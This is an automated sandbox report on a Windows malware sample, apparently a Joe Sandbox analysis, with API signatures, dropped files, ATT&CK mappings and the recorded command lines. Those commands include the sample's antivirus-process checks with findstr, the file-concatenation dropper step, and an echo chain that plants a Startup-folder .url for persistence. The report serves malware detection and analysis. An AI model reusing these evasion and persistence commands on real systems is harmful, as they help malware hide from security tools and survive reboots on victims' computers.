Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB8B75 push ecx; ret 10_2_00FB8B88
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AE8B75 push ecx; ret 18_2_00AE8B88

Persistence and Installation Behavior

barindex
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifFile created: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifFile created: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.urlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_010159B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_010159B3
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FA5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00FA5EDA
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B459B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,18_2_00B459B3
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AD5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,18_2_00AD5EDA
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00FB33B7
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifAPI coverage: 4.9 %
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00FF4005
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00FF494A
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00FF3CE2
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00FFC2FF
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00FFCD9F
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFCD14 FindFirstFileW,FindClose,10_2_00FFCD14
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00FFF5D8
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00FFF735
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00FFFA36
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00B24005
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_00B2494A
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_00B2C2FF
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_00B2CD9F
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2CD14 FindFirstFileW,FindClose,18_2_00B2CD14
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_00B2F5D8
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_00B2F735
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_00B2FA36
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00B23CE2
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FA5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00FA5D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\527294\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\527294Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, DatumHub.scr, 00000012.00000002.2981426217.00000000036C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_010045D5 BlockInput,10_2_010045D5
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FA5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00FA5240
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FC5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_00FC5CAC
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FE88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00FE88CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FBA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00FBA385
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FBA354 SetUnhandledExceptionFilter,10_2_00FBA354
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AEA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00AEA385
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AEA354 SetUnhandledExceptionFilter,18_2_00AEA354
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FE9369 LogonUserW,10_2_00FE9369
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FA5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00FA5240
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF1AC6 SendInput,keybd_event,10_2_00FF1AC6
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF51E2 mouse_event,10_2_00FF51E2
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Jeffrey Jeffrey.bat & Jeffrey.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 527294Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "phisexyerrorspuzzle" Recorder Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bottle + ..\Audi + ..\Duties + ..\Integral + ..\Warren + ..\Casio + ..\Sunny dJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\527294\Miniature.pif Miniature.pif dJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr" "C:\Users\user\AppData\Local\DatumHub Technologies\s"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\datumhub.url" & echo url="c:\users\user\appdata\local\datumhub technologies\datumhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\datumhub.url" & exit
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\datumhub.url" & echo url="c:\users\user\appdata\local\datumhub technologies\datumhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\datumhub.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FE88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00FE88CD
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00FF4F1C
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027CB000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmp, Miniature.pif, 0000000A.00000003.1802019539.000000000425F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Miniature.pif, DatumHub.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB885B cpuid 10_2_00FB885B
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FD0030 GetLocalTime,__swprintf,10_2_00FD0030
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FD0722 GetUserNameW,10_2_00FD0722
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FC416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00FC416A
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: DatumHub.scrBinary or memory string: WIN_81
Source: DatumHub.scrBinary or memory string: WIN_XP
Source: DatumHub.scrBinary or memory string: WIN_XPe
Source: DatumHub.scrBinary or memory string: WIN_VISTA
Source: DatumHub.scrBinary or memory string: WIN_7
Source: DatumHub.scrBinary or memory string: WIN_8
Source: DatumHub.scr.10.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_0100696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_0100696E
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_01006E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_01006E32
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B3696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,18_2_00B3696E
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B36E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,18_2_00B36E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
111
Masquerading
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials4
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection
Proc Filesystem1
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525251 Sample: 66fd8d779da5e_EscortsRadios.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 76 44 fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWz 2->44 48 Sigma detected: Search for Antivirus process 2->48 50 Sigma detected: Drops script at startup location 2->50 52 Machine Learning detection for sample 2->52 54 2 other signatures 2->54 10 66fd8d779da5e_EscortsRadios.exe 22 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 2 10->15         started        58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->58 19 DatumHub.scr 12->19         started        process6 file7 40 C:\Users\user\AppData\Local\...\Miniature.pif, PE32 15->40 dropped 46 Drops PE files with a suspicious file extension 15->46 21 Miniature.pif 4 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        29 7 other processes 15->29 signatures8 process9 file10 36 C:\Users\user\AppData\Local\...\DatumHub.scr, PE32 21->36 dropped 38 C:\Users\user\AppData\Local\...\DatumHub.js, ASCII 21->38 dropped 56 Drops PE files with a suspicious file extension 21->56 31 cmd.exe 2 21->31         started        signatures11 process12 file13 42 C:\Users\user\AppData\...\DatumHub.url, MS 31->42 dropped 34 conhost.exe 31->34         started        process14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
66fd8d779da5e_EscortsRadios.exe8%ReversingLabs
66fd8d779da5e_EscortsRadios.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr5%ReversingLabs
C:\Users\user\AppData\Local\Temp\527294\Miniature.pif5%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWz
unknown
unknownfalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/J66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000000.1784235440.0000000001059000.00000002.00000001.01000000.00000006.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, DatumHub.scr, 00000012.00000002.2979969921.0000000000B89000.00000002.00000001.01000000.00000008.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drfalse
      unknown
      http://nsis.sf.net/NSIS_ErrorError66fd8d779da5e_EscortsRadios.exefalse
      • URL Reputation: safe
      unknown
      https://www.autoitscript.com/autoit3/66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drfalse
        unknown
        No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1525251
        Start date and time:2024-10-03 23:44:08 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 8m 1s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:20
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:66fd8d779da5e_EscortsRadios.exe
        Detection:MAL
        Classification:mal76.expl.evad.winEXE@28/17@3/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 101
        • Number of non-executed functions: 294
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
